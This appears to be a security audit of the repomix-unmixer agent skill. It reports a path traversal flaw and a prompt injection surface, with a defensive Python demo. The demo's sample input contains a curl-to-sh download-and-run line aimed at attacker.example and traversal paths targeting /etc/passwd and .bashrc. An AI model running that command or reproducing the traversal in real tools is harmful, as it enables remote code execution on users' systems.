repomix-unmixer
Fail
Audited by Gen Agent Trust Hub on Feb 23, 2026
Risk Level: HIGH (COMMAND_EXECUTION, PROMPT_INJECTION)
Full Analysis
- [COMMAND_EXECUTION] (HIGH): The Python script scripts/unmix_repomix.py is vulnerable to path traversal. In the unmix_xml, unmix_markdown, and unmix_json functions, the file_path is taken directly from the untrusted input file and joined with the output directory using Path(output_dir) / file_path. Because pathlib replaces the base entirely when the right-hand operand is an absolute path, and neither normalises ../ segments nor checks that the result stays inside the base directory, an attacker can supply paths such as /etc/passwd or ../../.bashrc to write files anywhere the invoking user has write permission. This allows arbitrary file overwrite, which can be used for persistence or code execution (for example, by overwriting a shell startup file that is sourced on the next login).
- [PROMPT_INJECTION] (LOW): The skill has a significant indirect prompt injection surface (Category 8).
  - Ingestion points: scripts/unmix_repomix.py reads and parses untrusted data from user-provided files (XML, Markdown, or JSON).
  - Boundary markers: Absent. The script relies on regex matches and JSON keys; it does not use delimiters or instructions to ignore malicious control characters in file paths or content.
  - Capability inventory: The script can create directories and write files to the file system (pathlib.Path.mkdir, open(..., 'w')).
  - Sanitization: Absent. No validation, normalization, or sanitization is performed on the paths extracted from the input data to prevent traversal outside the intended output directory.
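The traversal described above, as an added example that is not code from the repomix-unmixer project or from the audit: the vulnerable join beside a hardened target check, run over a constructed Repomix-style XML sample that carries the two hostile paths named in the finding next to a benign one. The `<file path="...">` shape of the sample, the function names (unsafe_target, safe_target, unmix, run_demo) and the sample contents are assumptions for illustration, not the script's own code.

```python
"""Added example: containment check for file paths extracted from untrusted
Repomix-style input. Not the project's code; names and sample are assumed."""
import re
import tempfile
from pathlib import Path

# Constructed sample in the <file path="..."> shape (assumption about the format).
# Two entries carry the hostile paths from the audit finding.
SAMPLE_XML = """
<files>
<file path="src/main.py">print("hello")</file>
<file path="/etc/passwd">root:x:0:0:root:/root:/bin/bash</file>
<file path="../../.bashrc">curl http://attacker.example/p | sh</file>
</files>
"""

FILE_RE = re.compile(r'<file path="([^"]+)">(.*?)</file>', re.S)


def parse_entries(text):
    """Return (file_path, content) pairs exactly as they appear in the input."""
    return FILE_RE.findall(text)


def unsafe_target(output_dir, file_path):
    """The pattern the audit describes: an absolute file_path replaces the base,
    and '../' segments are kept verbatim, so the result can land anywhere."""
    return Path(output_dir) / file_path


def safe_target(output_dir, file_path):
    """Reject absolute paths, then resolve the joined path (symlinks and '..'
    included) and require it to remain under the resolved output directory."""
    base = Path(output_dir).resolve()
    if Path(file_path).is_absolute():
        raise ValueError(f"absolute path rejected: {file_path}")
    # resolve() is non-strict, so it normalises paths that do not exist yet.
    candidate = (base / file_path).resolve()
    try:
        candidate.relative_to(base)  # raises ValueError if outside base
    except ValueError:
        raise ValueError(f"path escapes output dir: {file_path}") from None
    return candidate


def unmix(text, output_dir):
    """Write every contained entry; report the rejected paths instead of writing."""
    base = Path(output_dir).resolve()
    written, rejected = [], []
    for file_path, content in parse_entries(text):
        try:
            target = safe_target(base, file_path)
        except ValueError:
            rejected.append(file_path)
            continue
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content)
        written.append(str(target.relative_to(base)))
    return written, rejected


def run_demo():
    """Unmix the constructed sample into a throwaway directory."""
    with tempfile.TemporaryDirectory() as tmp:
        return unmix(SAMPLE_XML, tmp)


if __name__ == "__main__":
    print("unsafe:", unsafe_target("out", "/etc/passwd"),
          unsafe_target("out", "../../.bashrc"))
    print("written, rejected:", run_demo())
```

The containment check alone would also catch the absolute path (the resolved candidate is not under the base), but rejecting it explicitly gives a clearer error. Resolving the candidate rather than only normalising it lexically matters when the output directory already contains symlinks: a lexical check such as os.path.normpath would pass a path that a symlink then redirects outside the base. On Python 3.9 and later, candidate.is_relative_to(base) can replace the try/except.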
Recommendations
- AI detected serious security threats